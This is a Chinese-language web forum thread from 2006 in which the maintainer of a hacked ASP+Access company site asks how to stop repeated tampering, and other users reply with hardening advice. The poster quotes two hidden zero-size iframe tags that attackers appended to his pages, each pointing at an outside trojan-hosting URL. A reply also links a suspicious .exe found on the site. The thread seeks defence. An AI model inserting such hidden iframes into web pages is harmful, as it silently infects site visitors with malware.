28,391
社区成员
发帖
与我相关
我的任务
分享asp网站被人篡改,请问如何防护?
公司的asp+access网站,目前由我顺便维护。最近不知得罪哪路神仙,最近发现经常被人篡改。
周一上公司网站,杀毒软件报告说有病毒,ftp下来后发现在好几个asp文件的结尾处被人加了这样一句:
<iframe src="http://www.660083.com/qq/2.htm" width=0 height=0></iframe>
指向了一个含有木马病毒的页面。
重新上传了网站后,今天又发现在default.asp的最后加上了这样一句:
<iframe src="http://www.pook888.com/lp/mm.htm" width="0" height="0"
frameborder="0"></iframe>
请问高手,这是怎么回事,asp的源码怎么这么轻易就能被人改了,网站用的商业公司的虚拟空间。
(级别不够,只能给出20分,到时另开贴送分)
周一上公司网站,杀毒软件报告说有病毒,ftp下来后发现在好几个asp文件的结尾处被人加了这样一句:
<iframe src="http://www.660083.com/qq/2.htm" width=0 height=0></iframe>
指向了一个含有木马病毒的页面。
重新上传了网站后,今天又发现在default.asp的最后加上了这样一句:
<iframe src="http://www.pook888.com/lp/mm.htm" width="0" height="0"
frameborder="0"></iframe>
请问高手,这是怎么回事,asp的源码怎么这么轻易就能被人改了,网站用的商业公司的虚拟空间。
(级别不够,只能给出20分,到时另开贴送分)
...全文
请发表友善的回复…
发表回复
flying_knife 2006-11-20
- 打赏
- 举报
谢谢各位,再请问一下可以用什么软件检测一下有些什么漏洞?兄弟们是怎么看的呢?
flying_knife 2006-11-20
- 打赏
- 举报
结贴,感谢各位
jerry365(水煮三国),heroooooo(学习.NET),huolingfeng(),yiyunsanyue()已另贴给分(http://community.csdn.net/Expert/TopicView3.asp?id=5166697),在此不再给分。
再次感谢,特别感谢多次热忱回复的兄弟,谢谢。
jerry365(水煮三国),heroooooo(学习.NET),huolingfeng(),yiyunsanyue()已另贴给分(http://community.csdn.net/Expert/TopicView3.asp?id=5166697),在此不再给分。
再次感谢,特别感谢多次热忱回复的兄弟,谢谢。
youufis 2006-11-18
- 打赏
- 举报
估计网站程序本身有漏洞。很多单位用动易系统,动网论坛,都需要打补丁的。
Breakc0de 2006-11-18
- 打赏
- 举报
你的站点我刚刚看了一下,漏洞百出。 你说怎么不被改~~~???
addwing 2006-11-18
- 打赏
- 举报
.
reply30 2006-11-17
- 打赏
- 举报
感谢!
jerry365(水煮三国)
heroooooo(学习.NET)
huolingfeng()
heroooooo(学习.NET)
yiyunsanyue()
wansai00(天紫)
各位,这个ID没分了,请各位到下贴领分:
http://community.csdn.net/Expert/TopicView3.asp?id=5166697
回头一起结贴,要不然结了看不到了。
jerry365(水煮三国)
heroooooo(学习.NET)
huolingfeng()
heroooooo(学习.NET)
yiyunsanyue()
wansai00(天紫)
各位,这个ID没分了,请各位到下贴领分:
http://community.csdn.net/Expert/TopicView3.asp?id=5166697
回头一起结贴,要不然结了看不到了。
yiyunsanyue 2006-11-17
- 打赏
- 举报
给3000块,我就不嫌劳苦帮你全站修整一下吧^^
___________
太狠点了吧???哈哈!!
___________
太狠点了吧???哈哈!!
fcuandy 2006-11-17
- 打赏
- 举报
给3000块,我就不嫌劳苦帮你全站修整一下吧^^
huolingfeng 2006-11-17
- 打赏
- 举报
不换程序的话,
把manage删掉,每次更新的时候在传上去,更新玩在删掉
仔细检查网站,看有木马没有,全部下载下来,杀毒
下班回家了,8
把manage删掉,每次更新的时候在传上去,更新玩在删掉
仔细检查网站,看有木马没有,全部下载下来,杀毒
下班回家了,8
yiyunsanyue 2006-11-17
- 打赏
- 举报
没有什么规定。是不是你的分用完了??先揭了这个。。
flying_knife 2006-11-17
- 打赏
- 举报
怎么我再开帖给分栏是(0--0)呀?
csdn有些什么规定吗?
csdn有些什么规定吗?
flying_knife 2006-11-17
- 打赏
- 举报
S说的没有什么用吧??
关键是现在好象有洞了。分太少,都TMD的不揭贴..
====
分一定会给的,我最多只能给20分,一定另外多开帖送分
关键是现在好象有洞了。分太少,都TMD的不揭贴..
====
分一定会给的,我最多只能给20分,一定另外多开帖送分
heroooooo 2006-11-17
- 打赏
- 举报
用的虚拟空间,权限应该限得比较严,我也改动不了那些权限
______________
不是你自己的服务器???
______________
不是你自己的服务器???
flying_knife 2006-11-17
- 打赏
- 举报
把网站的目录权限 internet来宾账号 可以修改的权限去掉
应该就超安全了
-----------------
用的虚拟空间,权限应该限得比较严,我也改动不了那些权限
应该就超安全了
-----------------
用的虚拟空间,权限应该限得比较严,我也改动不了那些权限
heroooooo 2006-11-17
- 打赏
- 举报
LS说的没有什么用吧??
关键是现在好象有洞了。分太少,都TMD的不揭贴..
关键是现在好象有洞了。分太少,都TMD的不揭贴..
flying_knife 2006-11-17
- 打赏
- 举报
http://www.goldeneye.net.cn/mp.exe ?
是谁刚放上去的
是谁刚放上去的
wansai00 2006-11-17
- 打赏
- 举报
把网站的目录权限 internet来宾账号 可以修改的权限去掉
应该就超安全了
应该就超安全了
flying_knife 2006-11-17
- 打赏
- 举报
哦,
怎么看漏洞?
怎么看漏洞?
yiyunsanyue 2006-11-17
- 打赏
- 举报
http://www.goldeneye.net.cn/mp.exe
楼主看看这个是什么??
楼主看看这个是什么??
yiyunsanyue 2006-11-17
- 打赏
- 举报
有,网站程序好象有很多的洞..
加载更多回复(16)
